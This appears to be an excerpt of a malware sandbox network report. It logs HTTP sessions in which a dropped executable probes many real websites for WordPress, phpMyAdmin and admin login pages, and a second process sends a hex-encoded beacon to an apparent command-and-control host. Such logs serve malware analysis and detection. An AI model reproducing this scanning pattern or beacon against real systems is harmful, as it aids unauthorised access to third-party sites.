276 | 192.168.2.6 | 56615 | 64.190.63.111 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.617278099 CET | 171 | OUT | GET /wp-login.php HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.827147007 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:14:52 GMT
content-length: 0
server: NginX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.827696085 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://foros.net/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.042984009 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
277 | 192.168.2.6 | 56629 | 185.51.191.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.656656981 CET | 183 | OUT | GET /admin.php HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.967649937 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=019fa6765b3e7cece27a9cb77609005d; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:52 GMT; Max-Age=86400
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 334f<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
Feb 5, 2024 12:14:52.967662096 CET | 1286 | IN | Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
Feb 5, 2024 12:14:52.967674017 CET | 1286 | IN | Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
Feb 5, 2024 12:14:52.967686892 CET | 1286 | IN | Data Ascii: ttp://innovationdevelopment.eu/pl/admin.php" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/admin.php" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/admin.php" /><link h
Feb 5, 2024 12:14:52.967700005 CET | 1286 | IN | Data Ascii: tById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="
Feb 5, 2024 12:14:52.967719078 CET | 1286 | IN | Data Ascii: ="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a>
Feb 5, 2024 12:14:52.967731953 CET | 1286 | IN | Data Ascii: +screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allow
Feb 5, 2024 12:14:52.967756987 CET | 1286 | IN | Data Ascii: ookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two
Feb 5, 2024 12:14:52.967767954 CET | 1286 | IN | Data Ascii: , but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses c
Feb 5, 2024 12:14:52.967778921 CET | 1286 | IN | Data Ascii: ooter_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35p
Feb 5, 2024 12:14:52.976114035 CET | 811 | IN | Data Ascii: t:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="e


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                278192.168.2.656623181.4.228.15580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.698554039 CET188OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.967442036 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:14:52.967453003 CET | 151 | IN | Data Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
279 | 192.168.2.6 | 56637 | 41.33.126.100 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.762293100 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.015039921 CET | 143 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
280 | 192.168.2.6 | 56672 | 103.224.182.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.762505054 CET | 325 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __tad=1707131691.1659755
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
Feb 5, 2024 12:14:52.937621117 CET | 264 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/administrator/index.php?sub1=20240205-2214-52f0-ba33-ad43e9ad61a1
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
281 | 192.168.2.6 | 56705 | 192.185.5.23 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.823451042 CET | 176 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.927304983 CET | 226 | IN | HTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
282 | 192.168.2.6 | 56673 | 181.4.228.155 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.872332096 CET | 186 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137789011 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:14:53.137799978 CET | 151 | IN
Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
283 | 192.168.2.6 | 56679 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.875741005 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:53.120047092 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
284 | 192.168.2.6 | 56764 | 162.241.203.30 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.966193914 CET | 176 | OUT | GET /wp-login.php HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.073643923 CET | 226 | IN | HTTP/1.1 409 Conflict
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
Content-Length: 83
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
Feb 5, 2024 12:14:53.074125051 CET | 218 | OUT | GET /wp-admin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://nossoplayer.me/wp-login.php


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
285 | 192.168.2.6 | 56810 | 192.185.5.23 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.035552025 CET | 218 | OUT | GET /wp-admin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://multiideas.com/wp-login.php
Feb 5, 2024 12:14:53.206428051 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=de3d28e45584db127222b7d93e7ba773; path=/
Upgrade: h2,h2c
Connection: Upgrade
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206442118 CET1286INData Raw: 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd bb d7 9f f7 7f f9 cb e7 cf cd df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: w]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu6ucPK
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206454992 CET1286INData Raw: db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48 b1 b8 bb eb bb e5 62 e8 90 ba 3f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.I}?_?_
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206466913 CET1286INData Raw: 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c b4 47 fc b4 ed e6 77 cb 3d ce df 8a c9 7f 8f 06 6a ae
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w4~/;
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206482887 CET1286INData Raw: 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c 82 d4 75 4c 34 82 c1 2c 7a 4b 4c 0c 28 70 ac aa 64 81
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.JWy{*+
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206499100 CET1286INData Raw: 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d 8d f1 75 2d 0a b2 da 04 12 b3 3b 95 c0 aa 23 6d 86 37
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-krYpMPv
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206510067 CET697INData Raw: ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93 a5 05 a6 12 c8 bd 6c a4 e4 a4 31 a2 51 d3 53 96 ff 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*:ZQ5
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206523895 CET1286INData Raw: 31 66 61 30 0d 0a a9 85 71 84 ba ca 17 99 be c8 9d 6a a1 ae 8e 09 19 0d 16 b1 a5 09 16 19 c1 87 01 1f 21 72 87 e8 fc 5a 43 43 9a 0d d9 b1 aa 55 05 7f 57 a9 d2 a2 a4 e8 52 bb dc 68 57 8d 63 f2 c8 3c 2c ea 3c 4b 32 b4 8c 52 32 4a e7 51 32 49 e7 49
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1fa0qj!rZCCUWRhWc<,<K2R2JQ2IIq91QShym#ipiPcMxxVZ7L?l]5yu(kw9Rs9f|JydxGIK"3M:p/xl%*!sX,#vw5
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206537008 CET1286INData Raw: ab 65 bf 38 1c e6 05 63 53 28 94 5d d9 ba f4 96 44 1c 2d e1 ec b8 88 8f fe 4c 68 aa fc a0 e5 27 f3 b7 d6 36 88 07 b4 e4 09 41 a9 1a f3 87 b3 0f 70 75 d4 63 c7 53 e6 f3 d3 30 a9 59 8f fd c6 24 35 99 35 4c 40 3c 9d 90 1a 5f a6 50 ff 7f 05 6d 28 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e8cS(]D-Lh'6ApucS0Y$55L@<_Pm(kzj?[7MeFXGN)C*A{!E saOV:UjPS96u:7S4I42cD0P$X!4MD_Va.lB@eU$Ux&;Sd
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206547976 CET1286INData Raw: 73 8a 6d 8a 42 11 ee 38 cd 33 0b 16 3a 53 94 0d 24 44 72 fb 2c df 18 8b 1d 20 b7 2f 4d 55 ab 86 b9 94 0b ee ac f2 e6 64 86 c2 32 1e f2 87 ca 94 e4 2c 7e 70 8d f1 3e 0c e7 fc 00 45 a2 c0 b1 96 02 21 17 53 6a 62 f4 c0 12 91 41 8d 02 d5 80 ad cd a8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: smB83:S$Dr, /MUd2,~p>E!SjbAm<w#!hzVO*[ghm(R+BT,teg|0u(JJe*z\=|Ej^=ZvzD{Z\ebRv3
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.308195114 CET1286INData Raw: 05 a9 d0 5c c7 84 d8 c6 44 75 d2 0e d0 4c 42 9b 2a 35 84 99 2a c4 26 d8 01 27 ec 84 9b e8 d6 be 74 a1 3e d6 dc 68 1d ca c6 c7 a3 2f c3 5a 23 8c fe d8 94 36 c0 e3 95 a8 8e 2a 03 ed 51 8d 55 f1 d5 38 0e 4b c9 e3 ac bd 01 20 1f 02 c7 07 e0 77 b2 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \DuLB*5*&'t>h/Z#6*QU8K w.Os]~/"eh@k[6-g?jO:U{~PZhm29?Vo|4pZ#=Fc]h72.?tX|uU](]<]#S2F#@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
286 | 192.168.2.6 | 56863 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.080317974 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.217520952 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:14:53 GMT
Location: https://accounts.google.com/phpmyadmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 183
Server: GSE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
287 | 192.168.2.6 | 56882 | 162.241.203.30 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.112870932 CET | 175 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.230410099 CET | 1114 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
288 | 192.168.2.6 | 56887 | 104.18.32.109 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.119800091 CET | 181 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.259934902 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:08 GMT
Set-Cookie: __cf_bm=HTdhiFEHQ5RGQCcLrcRtNpgnvzRyndeZpTAuCOlwX6w-1707131693-1-AbCaMLIjDqngVMcGLilAlUXwWsRi7mqIuPYzF0jb7+CWUPLUIhQswNu9gDr78WVmD54g64fXmrtQsks4sMe1hg8=; path=/; expires=Mon, 05-Feb-24 11:44:53 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb7a5cd51d6a-ATL
Content-Encoding: gzip
